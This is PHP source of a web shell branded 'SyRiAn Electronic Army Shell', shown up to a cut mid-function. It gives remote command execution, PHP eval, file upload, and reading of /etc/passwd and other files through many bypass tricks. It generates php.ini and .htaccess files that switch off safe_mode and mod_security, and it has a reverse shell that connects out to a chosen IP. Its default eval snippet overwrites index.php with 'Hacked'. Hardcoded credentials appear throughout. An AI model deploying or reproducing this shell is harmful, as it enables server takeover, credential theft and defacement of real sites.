[SHELL_SCRIPT]=> SyRiAn Electronic Army Shell :: SEA Shell

1. <?php
2. # Bypass SuHosin
3. # Virtual
4. # users 6 ID /etc/passwd
5.  
6. $user = 'mhu';
7. $pass = 'mhu';
8. $uselogin = 1;
9. $sh3llColor = "green";
10.  
11. # MySQL Info ---------
12. $DBhost = "localhost";
13. $DBuser = "root";
14. $DBpass = "root";
15. #---------------------
16. session_start();
17. error_reporting(0);
18. set_magic_quotes_runtime(0);
19. set_time_limit(0);
20. ignore_user_abort(TRUE);
21. ini_restore("safe_mode");
22. ini_restore("open_basedir");
23. ini_set('max_execution_time',0);
24. ini_set('output_buffering',0);
25. ini_set('safe_mode','Off');
26.  
27. // Set Current Directory
28. if(!$_POST && !$_SESSION['curDir']) {
29.     $dir = getcwd();
30.     $_SESSION['curDir'] = $dir;
31. } else if(empty($_POST['curDir'])) {
32.     $dir = $_SESSION['curDir'];
33. } else {
34.     $dir = filter($_POST['curDir']);
35.     $_SESSION['curDir'] = $dir;
36. }
37. // Set Dir Mode
38. if($_GET['dir_mode']) {
39.     $dir_mode = $_GET['dir_mode'];
40.     $_SESSION['dir_mode'] = $dir_mode;
41. } else {
42.     $dir_mode = $_SESSION['dir_mode'];
43. }
44.  
45. // Set Usable Command
46. if($_POST['exe_method']) {
47.     $exec_method = $_POST['exe_method'];
48. } else {
49.     $exec_method = "exec";
50. }
51. # Logout
52. if($_POST['logout']) {
53.     print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
54.     print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
55. }
56. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
57. if($_GET['info']){phpinfo();}
58. $safeMode = SafeMode();
59. $server = substr($SERVER_SOFTWARE,0,120);
60. $daemon = "";
61. ?>
62. <html>
63. <head>
64. <title>SyRiAn Electronic Army Shell :: SEA Shell</title>
65. <link rel="shortcut icon" href='http://i40.tinypic.com/2rpuped.png' />
66. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
67. <?php echo CSS($sh3llColor); ?>
68.  
69. </head>
70. <body dir='ltr'>
71. <?php
72. # ---------------------------------------#
73. #             Authentication             #
74. #----------------------------------------#
75. if ($uselogin ==1) {
76.     if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
77.         if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
78.         if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
79.             print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
80.         } else {
81.             if($_POST['usrname']){
82.                 print'<script>alert("Go and play in the street man !!");</script>';
83.             }
84. ?>
85. <br><br>
86.             <center><img src="http://i40.tinypic.com/2rpuped.png"><br />
87.             <sy>SyRiAn Electronic Army</sy>
88.             </center><br />
89.             <div align="center">
90.                 <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
91.                 <input dir="ltr" name="usrname" id="username" value="" type="text"  size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
92.                 <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
93.                 <input type="submit" value=" Login  " name="login" />
94.                 </form>
95.             </div>
96.             <?php
97.             footer();
98.             exit;
99.         }
100.     }
101. }
102. ?>
103. <table cellpadding='0' cellspacing='0' width='100%'>
104.     <tr>
105.         <td width='160'>
106.         <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
107.             <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://i40.tinypic.com/2rpuped.png' width='100%' height='100%'></a><br>
108.             <center>SyRiAn Electronic Army
109.             <p></p>
110.                 <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
111.                     <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
112.                     <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
113.                 </select>
114.             </center>
115.       </td>
116.       <td>
117.       <form method="post">
118. <table width='100%' style="border:none; padding:2px;" >
119.     <tr>
120.         <td width='103'>System</td>
121.         <td width="323"><?php echo $os; ?></td>
122.         <td width="90">Apache Modules</td>
123.         <td width="278"><select ><?php
124.         if(function_exists("apache_get_modules")) {
125.             foreach (apache_get_modules() as $module) {
126.                 echo "<option>".$module."</option>";
127.             }
128.         }else {
129.             echo "<option>NONE</option>";
130.         }
131.         ?></select></td>
132.     </tr>
133.     <tr>
134.       <td>uname </td>
135.       <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
136.       <td>Curl</td>
137.       <td><?php echo Curl(); ?></td>
138.     </tr>
139.     <tr>
140.         <td>pwd</td>
141.         <td><?php echo getcwd(); ?></td>
142.         <td>Open Basedir</td>
143.         <td><?php echo openBaseDir(); ?></td>
144.     </tr>
145.     <tr>
146.         <td>whoami</td>
147.         <td><?php echo get_current_user(); ?></td>
148.         <td>Magic_Quotes</td>
149.         <td><?php echo magicQouts(); ?></td>
150.     </tr>
151.         <tr>
152.           <td>Server</td>
153.           <td><?php echo $server; ?></td>
154.           <td>Register Globals</td>
155.           <td><?php echo RegisterGlobals(); ?></td>
156.         </tr>
157.         <tr>
158.           <td>Server Name</td>
159.           <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
160.           <td>Gzip</td>
161.           <td><?php echo Gzip(); ?></td>
162.         </tr>
163.         <tr>
164.           <td>Your IP</td>
165.           <td><?php echo GetRealIP(); ?></td>
166.           <td>Oracle</td>
167.           <td><?php echo Oracle(); ?></td>
168.         </tr>
169.         <tr>
170.           <td>Server IP</td>
171.           <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
172.           <td>MSQL</td>
173.           <td><?php echo MSQL(); ?></td>
174.         </tr>
175.         <tr>
176.           <td>PHP Version</td>
177.           <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
178.           <td>MySQL</td>
179.           <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
180.         </tr>
181.         <tr>
182.           <td>Safe Mode</td>
183.           <td><?php echo $safeMode; ?></td>
184.           <td>MySQLi</td>
185.           <td><?php echo MysqlI(); ?></td>
186.         </tr>
187.         <tr>
188.         <td>disable functions</td>
189.         <td><select name="disableFunctions"><?php
190.         $funArray = DisableFunctions();
191.         $funArray = explode(",",$funArray);
192.         sort($funArray);
193.         foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
194.         ?></select>
195.           <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
196.           </td>
197.         <td>MsSQL</td>
198.         <td><?php echo MsSQL(); ?></td>
199.         </tr>
200. </table>
201. &nbsp;   [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
202. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
203. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
204. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
205. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
206. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
207. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
208. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
209. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
210. <input type="submit" name="find_755" id="find_755" value="Find 755" />
211. <br>
212. </form>
213. </table>
214.  
215. <form method="post">
216. <center>
217. <textarea cols="150" rows="20" name="result" >
218. <?php
219. chdir($dir);
220. if($_POST['login'] || !$_POST){echo ScanDirs();}
221. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
222. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
223. else if($_POST['UPLOAD_Execute']) {
224.     for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
225.         if($_FILES['uploadfile']['name'][$i] != '') {
226.             if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
227.             else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
228.             if($upload) {echo "The File  ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
229. ";  }
230.             else { echo "The File  ".$_FILES['uploadfile']['name'][$i]."  Can't Be Upload :( !
231. ";}
232.         }
233.     }      
234. }
235. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
236. else if($_POST['SAVE_Execute']) {
237.     $content = filter($_POST['result']);
238.     if(empty($content)){$content = " ";}
239.     if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
240. }
241. else if($_POST['READ_Execute']) {
242.     $path = urldecode(filter($_POST['READ_Line']));
243.     $file = fopen($path,'r+');
244.     if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path)));  }
245.     else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
246.     else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
247.     else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
248.     else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
249.     else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
250.     else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
251.     else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
252.     else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
253.     else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
254.     else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
255.     else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
256.     else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
257.     else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
258.     else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
259.     else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
260.     else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
261.     else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
262.     else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
263.     else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
264. }
265. else if($_POST['STOP_Execute']) {
266. $genTry = GenerateFile("php.ini","
267. safe_mode = Off
268. disable_functions = NONE
269. safe_mode_gid = OFF
270. open_basedir = OFF");
271.     if($genTry){echo "[+] php.ini Has Been Generated Successfully
272. ";}
273.     else {echo "[-] Failed to generate php.ini file !!
274. ";}
275.    
276.     $genTry = GenerateFile(".htaccess","
277. <IfModule mod_security.c>
278. SecFilterEngine Off
279. SecFilterScanPOST Off
280. SecFilterCheckURLEncoding Off
281. SecFilterCheckCookieFormat Off
282. SecFilterCheckUnicodeEncoding Off
283. SecFilterNormalizeCookies Off
284. </IfModule>
285. <Limit GET POST>
286. order deny,allow
287. deny from all
288. allow from all
289. </Limit>
290. <Limit PUT DELETE>
291. order deny,allow
292. deny from all
293. </Limit>
294. SetEnv PHPRC ".getcwd()."/php.ini
295.     ");
296.     if($genTry){echo "[+] .htaccess Has Been Generated Successfully
297. ";}
298.     else {echo "[-] Failed to generate .htaccess file !!
299. ";}
300. }
301. else if($_POST['CON_Type'] == "socks") {
302.     $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
303.     if($sock < 0){echo "[-] failed to create socket.";}
304.     else {
305.         $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
306.         if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
307.         else {
308.             $send_var = "\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$";
309.             socket_write($sock, $send_var, strlen($send_var));
310.             while($input = socket_read($sock, 10000)) {
311.                 socket_write($sock, shell_exec($input), 12000);
312.             }
313.         }
314.     }
315. } else if($_POST['CON_Type'] == "fsockopen") {
316.     $ip = filter(trim($_POST['ip']));
317.     $port = filter(trim($_POST['port']));
318.     if (!empty($ip)) {
319.         $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
320.         if (!$con_fsockopen){
321.             $result = "Error: didnt connect !!!";
322.         } else {
323.             $newLine="\n";          
324.             fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
325.             fputs($con_fsockopen , system("uname -a") .$newLine );
326.             fputs($con_fsockopen , system("pwd") .$newLine );
327.             fputs($con_fsockopen , system("id") .$newLine.$newLine );
328.             while(!feof($con_fsockopen)){  
329.                 fputs ($con_fsockopen);
330.                 $one="[$";
331.                 $two="]";
332.                 $result= fgets ($con_fsockopen, 8192);
333.                 $message = $result;
334.                 fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
335.             }
336.             fclose ($con_fsockopen);
337.         }
338.     }
339. }
340. else if($_POST['USERS_1']){echo GetUsers1();}
341. else if($_POST['USERS_2']) {
342.      $array = GetUsers2();
343.      foreach($array as $line)
344.      {echo $line."
345. ";}
346. }
347. else if($_POST['USERS_3']) {
348.      $array = GetUsers3();
349.      foreach($array as $line)
350.      {echo $line."
351. ";}
352. }
353. else if($_POST['USERS_4']) {
354.      $array = GetUsers4();
355.      foreach($array as $line)
356.      {echo $line."
357. ";}
358. } else if($_POST['USERS_5']){echo GetUsers5();}
359. else if($_POST['forbidden_bypass']) {
360.     mkdir("forbidden");
361.     chdir("forbidden");
362.     $forbidden_htaccess = GenerateFile(".htaccess", "
363. DirectoryIndex sea.txt
364. HeaderName sea.txt
365. ReadmeName sea.txt
366. footerName sea.txt
367. ErrorDocument 404 /404.html
368. 404.html = Symlinked sea.txt
369. Options all
370. ForceType text/plain
371. AddType text/plain .php
372. AddType text/plain .html
373. AddHandler server-parsed .php
374. AddHandler txt .php
375.     ");
376.     if($forbidden_htaccess) {
377.         echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
378.     } else {
379.         echo "[-] error with generating .htaccess file.";
380.     }
381. } else if($_POST['find_755']) {
382.     Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
383. }
384. ?></textarea>
385. <?php
386. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
387. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
388. ";}
389. ?>
390. </center></form>
391. <table width='100%'>
392.     <tr valign="top">
393.         <td width='30%'>
394.        <!-- Command Line -->
395.        <form method='POST' enctype="multipart/form-data">
396.             <table height='72' border='0' id='Box' width="100%">
397.               <tr>
398.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
399.                     <td style="background-color:#666;padding-left:10px;">Edit File
400.                     <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
401.               </tr>
402.                 <tr>
403.                   <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
404.                 </tr>
405.             </table>
406.         </form>
407.         <!-- End Of Command Line-->
408.        
409.         </td>
410.         <td width='30%' height='30'>
411.          <!-- Command Line -->
412.          <form method='POST' enctype="multipart/form-data">
413.               <table height='72' border='0' id='Box'>
414.               <tr>
415.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
416.                 <td style="background-color:#666;padding-left:10px;">Command Line
417.                 <?php echo print_exe_method(); ?>
418.                 <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
419.                 </td>
420.             </tr>
421.                 <tr>
422.                   <td height="45" colspan="2">
423.                     <?php echo SelectCommand($os); ?>
424.                     <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
425.                   <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
426.                 </tr>
427.             </table>
428.         </form>
429.         <!-- End Of Command Line-->
430.       </td>
431.         <td width='30%' height='30' valign="top">
432.         <!-- Commands Alias-->
433.         <form method='POST' enctype="multipart/form-data">
434.             <table width='100%' height='72' border='0' id='Box'>
435.               <tr>
436.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
437.                     <td style="background-color:#666;padding-left:10px;">Upload Files             <span style="padding-left:10px;">
438.                       <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
439.                     <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
440.                     </span></td>
441.               </tr>
442.                 <tr>
443.                   <td height="45" colspan="2">
444.                   <input type='file' name='uploadfile[]'>
445.                   <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
446.                 </tr>
447.             </table>
448.         </form>
449.         <!-- End Of Commands Alias-->
450.         </td>
451.     </tr>
452. <tr valign="top">
453.         <td width='30%'>
454.        <!-- Commands Alias-->
455.        <form method='POST' enctype="multipart/form-data">
456.             <table width='100%' height='72' border='0' id='Box'>
457.               <tr>
458.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
459.                     <td style="background-color:#666;padding-left:10px;">PHP Eval                
460.                     <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
461.               </tr>
462.                 <tr>
463.                   <td height="45" colspan="2"><label for="PHP_Line"></label>
464.                   <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
465.     fwrite($file,"Hacked");
466.     fclose($file);';}
467.                 ?>
468.                   </textarea>
469.                   <br></td>
470.               </tr>
471.             </table>
472.         </form>
473.         <!-- End Of Commands Alias-->
474.         </td>
475.         <td width='30%' height='30'>
476.         <!-- Commands Alias-->
477.         <form method='POST' enctype="multipart/form-data">
478.         <table width='100%' height='72' border='0' id='Box'>
479.           <tr>
480.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
481.                 <td style="background-color:#666;padding-left:10px;">Read Files
482.                  
483.                   <select name="READ_Type" >
484.                     <option value="file" >file</option>
485.                     <option value="fgets" >fgets</option>
486.                     <option value="fgetss" >fgetss</option>
487.                     <option value="readfile" >readfile</option>
488.                     <option value="fread" >fread</option>
489.                     <option value="show_source" >show_source</option>
490.                     <option value="file_get_contents" >file_get_contents</option>
491.                     <option value="tempnam" >tempnam</option>
492.                     <option value="copy" >copy</option>
493.                     <option value="symlink" >Symlink</option>
494.                     <option value="mb_send_mail" >mb_send_mail</option>
495.                     <option value="highlight_file" >highlight_file</option>
496.                     <option value="curl" >Curl</option>
497.                     <option value="imap" >Imap</option>
498.                     <option value="mysql" >MySQL</option>
499.                     <option value="mysqli" >MySQLI</option>
500.                     <option value="ioncube">Ion Cube</option>
501.                     <option value="error_log">Error_Log</option>
502.                     <option value="include">Include</option>
503.                     <option value="id" >ID /etc/passwd</option>
504.                   </select>
505.                   <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
506.           </tr>
507.             <tr>
508.               <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
509.           </tr>
510.         </table>
511.         </form>
512.         <!-- End Of Commands Alias-->
513.   </td>
514.         <td width='30%' height='30' valign="top">
515.         <!-- Commands Alias-->
516.         <form method='POST' enctype="multipart/form-data">
517.         <table width='100%' height='72' border='0' id='Box'>
518.           <tr>
519.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
520.                 <td style="background-color:#666;padding-left:10px;">Back Connection
521.                 <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
522.           </tr>
523.             <tr>
524.               <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
525.               <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
526.               <select name="CON_Type" >
527.                 <option value="socks">SOCKS</option>
528.                 <option value="fsockopen">FSOCKOPEN</option>
529.               </select>
530.               </td>
531.             </tr>
532.         </table>
533.         </form>
534.         <!-- End Of Commands Alias-->
535.         </td>
536.     </tr>
537. </table>
538. <?php
539. function IncludeReader($path) {
540.     global $os;
541.     if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
542.     $fileName = substr(strrchr($path,$slash),1);
543.     $includePath = substr($path,0,strpos($path,$fileName,0));
544.     ini_set("include_path",$includePath);
545.     include($fileName);
546. }
547. function GetUsers1() {
548.     return Exe('ls /var/mail');
549. }
550. function GetUsers2() {
551.     $array = array();
552.     $lines = file("/etc/passwd");
553.     foreach($lines as $nr=>$val) {
554.         $str = explode(":",$val);
555.         array_push($array,$str[0]);
556.     }
557.     return $array;
558. }
559. function GetUsers3() {
560.     $array = array();
561.     if ($dh = opendir("/home/"))  {
562.         while (($file = readdir($dh)) !== false)  {
563.             array_push($array,$file);
564.         }
565.         closedir($dh);
566.         return $array;
567.     }
568. }
569. function GetUsers4() {
570.     $dir = "/home/";
571.     $array = array();
572.      if ($dh = opendir($dir)) {
573.         $f = readdir($dh);
574.         while (($f = readdir($dh)) !== false) {
575.             $dh2=opendir($dir."/");
576.             $f2 = readdir($dh2);
577.             while (($f2 = readdir($dh2)) !== false) {
578.                 $f2.="/";
579.                 $dh3=opendir($dir.$f.$f2);
580.                 $f3 = readdir($dh3);
581.                 while (($f3 = readdir($dh3)) !== false) {
582.                     array_push($array,$f3);
583.                 }
584.             }
585.         }
586.         closedir($dh);
587.         return $array;
588.      } 
589. }
590. function GetUsers5(){
591.     return realpath('/etc/passwd');
592. }
593. function ErrorLog($path){
594.     $tempFile = uniqid();
595.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
596.     error_log(file_get_contents($path), 3, $tempFile);
597.     $content = file_get_contents($tempFile);
598.     unlink($tempFile);
599.     return $content;   
600. }
601. function SymlinkF($path) {
602.     $tempFile = uniqid();
603.     if(function_exists('symlink')) {
604.         symlink($path,$tempFile);
605.         $content = file_get_contents($tempFile);
606.         unlink($tempFile);
607.         return $content;
608.     }
609. }
610. function MySQLReader($path) {
611.     global $DBhost,$DBuser,$DBpass;
612.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
613.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
614.     mysql_query("CREATE DATABASE a");
615.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
616.     mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
617.     mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
618.     $result = mysql_query("SELECT a FROM a.a");
619.     while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
620.     mysql_query("DROP DATABASE a");
621. }
622. function MySQLIReader($path) {
623.     global $DBhost,$DBuser,$DBpass;
624.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
625.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
626.     mysql_query("CREATE DATABASE a");
627.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
628.    
629.     function r($fp, &$buf, $len, &$err) {
630.       print fread($fp, $len);
631.     }
632.     $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
633.     $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
634.     $m->set_local_infile_handler("r");
635.     $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
636.     $m->close();
637. }
638. function DBConnect($host,$user,$pass,$db) {
639.     $connect = mysql_pconnect($host,$user,$pass);
640.     if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false;  }
641.     else {
642.         $tryToSelectDB = mysql_select_db($db,$connect);
643.         if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false;      }
644.         else{return true; return $connect;}
645.     }
646. }
647. function ReadId($path) {
648.     for($uid=0;$uid<60000;$uid++) {  
649.         $ara = posix_getpwuid($uid);
650.         if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
651.         }
652.     }
653.     return $content;
654. }
655. function ImapF($path) {
656.     $stream = imap_open($path, "", "");
657.     $str = imap_body($stream, 1);
658.     imap_close($stream);
659.     return $str;
660. }
661. function FileF($path) {
662.     $lines = file($path); foreach($lines as $line){$content .= $line;}
663.     return $content;
664. }
665. function CopyF($path) {
666.     $tempFile = md5(uniqid()).".bb";
667.     copy($path,$tempFile);
668.     $content = file_get_contents($tempFile);
669.     unlink($tempFile);
670.     return $content;
671. }
672. function fgetssF($path) {
673.     while(($line = fgetss($path)) != false){$content .= $line;}
674.     return $content;
675. }
676. function highlightFile($path) {
677.     return highlight_file($path);
678. }
679. function mbSendEmail($path) {
680.     if(function_exists('mb_send_mail')) {
681.         $tempFile = uniqid();
682.         $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
683.         mb_send_mail("[email protected]", NULL, NULL, NULL, $additional_param);
684.         $content = file_get_contents($tempFile);
685.         unlink($tempFile);
686.         return $content;
687.     }
688. }
689. function DeleteFile($fileName) {
690.     global $os;
691.     if(function_exists('unlink'))
692.     {$delete = unlink($fileName);}
693.     if((!$delete) && ($os == 'Windows'))
694.     {$delete = Exe("del $fileName"); }
695.     else if((!$delete) && ($os == 'Linux'))
696.     {$delete = Exe("rm -f $fileName");}
697.     if($delete){return true;}else{return false;}
698. }
699. function CurlFileRead($path) {
700.     $ch = curl_init("file://".$path."\x00".__FILE__);
701.     var_dump(curl_exec($ch));
702. }
703. function FReadF($path) {
704.     $file = fopen($path,'r+'); //Open The File
705.     if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
706.     fclose($file);
707. }
708. function TempnameF($path) {
709.     global $dir;
710.     $temp = tempnam($dir, "cx");
711.     if(copy("compress.zlib://".$path, $temp)) {
712.         $handler = fopen($temp, "r");
713.         $readFile = fread($handler, @filesize($temp));
714.         fclose($handler);
715.         $content .= htmlspecialchars($filename);
716.         $content .= nl2br(htmlspecialchars($readFile));
717.         $content .= htmlspecialchars($filename);
718.         unlink($temp);
719.         return $content;
720.     }  
721. }
722. function Evaluation($eval) {
723.     $eval = str_replace(array("<?php","<?","?>"),"",$eval);
724.     $eval = eval($eval);
725.     if($eval){return true;}else{return false;}
726. }
727. function Oracle() {
728.     if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
729.     else {$oracle = '<font color="green">OFF</font>';}return $oracle;
730. }
731. function MsSQL() {
732.     if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
733.     else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
734. }
735. function MySQL2() {
736.     $mysql_try = function_exists('mysql_connect');
737.     if($mysql_try){$mysql = '<font color="red">ON</font>';}
738.     else {$mysql = '<font color="green">OFF</font>';}return $mysql;
739. }
740. function MSQL() {
741.     if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
742.     else {$mSql = '<font color="green">OFF</font>';}return $mSql;
743. }
744. function MysqlI() {
745.     if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
746.     else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
747. }
748. function Gzip() {
749.     if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
750.     else {$gzip = '<font color="green">OFF</font>';}return $gzip;
751. }
752. function openBaseDir() {
753.     $openBaseDir = ini_get("open_basedir");
754.     if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
755.     else {$openBaseDir = '<font color="red">ON</font>';}   
756.     return $openBaseDir;
757. }
758. function Curl() {
759.     if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
760.     else{$curl = '<font color="green">OFF</font>';}return $curl;
761. }
762. function magicQouts() {
763.     if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
764.     if (empty($mag)){$mag = '<font color="green">OFF</font>';}
765.     else {$mag= '<font color="red">ON</font>';}return $mag;
766. }
767. function SafeMode() {
768.     $safe_mode = ini_get("safe_mode");
